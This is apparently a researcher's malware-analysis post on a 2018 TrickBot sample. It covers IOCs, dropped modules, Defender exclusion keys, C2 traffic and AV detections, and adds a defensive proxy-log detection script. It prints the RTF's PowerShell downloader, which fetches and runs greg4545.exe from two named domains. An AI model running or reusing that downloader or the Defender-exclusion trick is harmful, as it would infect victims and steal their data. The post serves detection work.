Neonprimetime

2018-05-15 trickbot sample

May 15th, 2018
#malware #trickbot
found by @neonprimetime security

sample: https://www.reverse.it/sample/4087601bfc591c48bf90026164dde735b91f08898fbef13f0e85c8e64fc79487?environmentId=120

iocs:
correspondence.doc
fd55b840d747fc0601b03f53d5d3d314
task.bat
D7746CD2D5E2BBF4961704E76A13EECB
digitalmindsolution.com
thirdeyetv.com
lewl.bin
greg4545.exe
A6DCE7423960304106B6AD8D7F7D9FAD

copied itself to:
C:\Users\xxxxx\AppData\Roaming\winhttp\
launched its own copy of svchost.exe

files created:
C:\Users\Win7\AppData\Roaming\winhttp\FAQ
C:\Users\Win7\AppData\Roaming\winhttp\README.md
C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64 ( md5,861CFB79C14293F1DA731E42B90BD811 )
C:\Users\Win7\AppData\Roaming\winhttp\Modules\systeminfo64 ( md5,5D4512296AA66BFC0F2AE610556D84F2 )
C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\dinj (md5,7AED4235BC16913C98DCC866C087F38C)
C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\dpost (md5,15B4898CF67FF914DBA1EEF3BC6C9646)
C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\sinj (md5,2DFB40BAA7110C0418DA49F997710A9E)

registry keys added (Windows Defender path exclusions covering the drop directory):
HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000

network connections:
GET /ip HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Host: ipinfo.io

POST /ser0514ca/[REDACTED PC NAME]_W617601.5A9716C6537690A1A0AA513B7AEF3301/82/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 70.182.4.158
Content-Disposition: form-data; name="data"
**** REDACTED LIST OF FILES I HAD OPEN AND URLS I HAD OPEN IN BROWSER ****
Content-Disposition: form-data; name="source"
IE history
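The POST above carries the bot's check-in path: a group tag, then the victim hostname joined to an OS build number and a 32-hex-character client id, then a command number. A proxy-log matcher for that shape, added here as an example (not the author's code): the regex is generalised from the one request on the page, which is an assumption, and the external-IP lookup to ipinfo.io is reported at low severity because on its own it is common in legitimate software. The log lines are constructed; the C2 IP and tag on the second line are taken from the page, the rest are made up.

```python
import re

# Constructed proxy-log excerpt, one "<method> <host> <uri>" per line. Line 2
# reproduces the check-in recorded above (hostname made up); line 5 is a second
# made-up request in the same shape; the rest is benign filler.
SAMPLE_PROXY_LOG = """
GET ipinfo.io /ip
POST 70.182.4.158 /ser0514ca/WIN7-PC_W617601.5A9716C6537690A1A0AA513B7AEF3301/82/
GET www.example.com /index.html
POST www.example.com /api/upload/82/
POST 203.0.113.7 /lib0601ab/DESKTOP-1_W10017134.0123456789ABCDEF0123456789ABCDEF/14/
"""

# Assumed general form, derived from the single URI on the page:
#   /<group tag>/<hostname>_W<os build>.<32 hex client id>/<command number>/
C2_URI_RE = re.compile(
    r"^/(?P<tag>[A-Za-z0-9]+)/"
    r"(?P<victim>[^/]+)_W(?P<osbuild>\d+)\.(?P<clientid>[0-9A-Fa-f]{32})/"
    r"(?P<cmd>\d+)/$"
)


def classify_request(method, host, uri):
    """Return an alert dict for a request matching one of the two indicators, else None."""
    m = C2_URI_RE.match(uri)
    if m:
        return {
            "severity": "high",
            "reason": "TrickBot-style C2 check-in URI",
            "method": method.upper(),
            "host": host,
            "tag": m.group("tag"),
            "victim": m.group("victim"),
            "osbuild": m.group("osbuild"),
            "clientid": m.group("clientid"),
            "cmd": int(m.group("cmd")),
        }
    if host.lower() == "ipinfo.io" and uri == "/ip":
        return {
            "severity": "low",
            "reason": "external IP lookup (preceded the C2 check-in in this sample)",
            "method": method.upper(),
            "host": host,
        }
    return None


def scan_proxy_log(log):
    """Apply classify_request to every well-formed line and collect the alerts."""
    alerts = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip blank or malformed lines
        alert = classify_request(*parts)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"[{a['severity']}] {a['method']} {a['host']} - {a['reason']}")
```

Correlating a low-severity ipinfo.io hit with a high-severity check-in from the same client within a short window reproduces the sequence seen in this run; the victim field also lets you pivot straight to the infected host without relying on the proxy's source IP.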

interesting in-memory strings:
0x1e276a (90): C:\Users\Win7\AppData\Roaming\winhttp\bad.exe

script in the rtf:

PowerShell ""function irJohn74([String] $KingOfSleep){(New-Object System.Net.WebClient).DownloadFile($KingOfSleep,'%TEMP%\greg4545.exe');Start-Process '%TEMP%\greg4545.exe';}try{irJohn74('http://digitalmindsolution.com/lewl.bin')}catch{irJohn74('http://thirdeyetv.com/lewl.bin')}""

vt hits for RTF/DOC:
MicroWorld-eScan,Exploit.RTF-PSH.Gen,14.05.2018,1
CAT-QuickHeal,Exp.RTF.Heur.Gen.A,14.05.2018,1
McAfee,Exploit-CVE2017-11882.p,14.05.2018,1
Arcabit,Exploit.RTF-PSH.Gen,14.05.2018,1
Kaspersky,HEUR:Exploit.MSOffice.Generic,14.05.2018,1
BitDefender,Exploit.RTF-PSH.Gen,14.05.2018,1
Ad-Aware,Exploit.RTF-PSH.Gen,14.05.2018,1
Sophos,Exp/201711882-M,14.05.2018,1
F-Secure,Exploit.RTF-PSH.Gen,14.05.2018,1
TrendMicro,HEUR_RTFMALFORM,14.05.2018,1
McAfee-GW-Edition,Exploit-CVE2017-11882.p,14.05.2018,1
Emsisoft,Exploit.RTF-PSH.Gen (B),14.05.2018,1
Avira,EXP/CVE-2017-11882.Gen,14.05.2018,1
AegisLab,Exploit.Msoffice.Generic!c,14.05.2018,1
ZoneAlarm,HEUR:Exploit.MSOffice.Generic,14.05.2018,1
GData,Exploit.CVE-2017-11882.Gen,14.05.2018,1
ALYac,Exploit.RTF-PSH.Gen,14.05.2018,1
MAX,malware (ai score=81),14.05.2018,1
Tencent,Office.Exploit.Generic.Efar,14.05.2018,1
Fortinet,PowerShell/Agent.C1546!tr.dldr,14.05.2018,1
Qihoo-360,Win32/Trojan.Exploit.ed7,14.05.2018,1

vt hits for EXE:
MicroWorld-eScan,Trojan.GenericKD.40242422,15.05.2018,0
Cylance,Unsafe,15.05.2018,0
Invincea,heuristic,03.05.2018,12
Symantec,ML.Attribute.HighConfidence,14.05.2018,1
TrendMicro-HouseCall,Suspicious_GEN.F47V0514,15.05.2018,0
Avast,FileRepMalware,15.05.2018,0
Kaspersky,UDS:DangerousObject.Multi.Generic,15.05.2018,0
Babable,Malware.HighConfidence,06.04.2018,39
AegisLab,Ml.Attribute.Gen!c,15.05.2018,0
Ad-Aware,Trojan.GenericKD.40242422,15.05.2018,0
McAfee-GW-Edition,BehavesLike.Win32.Ransomware.gh,14.05.2018,1
SentinelOne,static engine - malicious,25.02.2018,79
Webroot,W32.Malware.Gen,15.05.2018,0
Endgame,malicious (high confidence),07.05.2018,8
ZoneAlarm,Trojan.Win32.Inject.ajogy,15.05.2018,0
McAfee,Artemis!A6DCE7423960,15.05.2018,0
VBA32,BScope.Trojan.Inject,14.05.2018,1
ESET-NOD32,Win32/TrickBot.AQ,15.05.2018,0
Ikarus,PUA.Multibar,14.05.2018,1
AVG,FileRepMalware,15.05.2018,0
Paloalto,generic.ml,15.05.2018,0

vt hits for batch script:
McAfee,PS/Agent.u,14.05.2018,1
McAfee-GW-Edition,PS/Agent.u,14.05.2018,1
Fortinet,PowerShell/Agent.C1546!tr.dldr,14.05.2018,1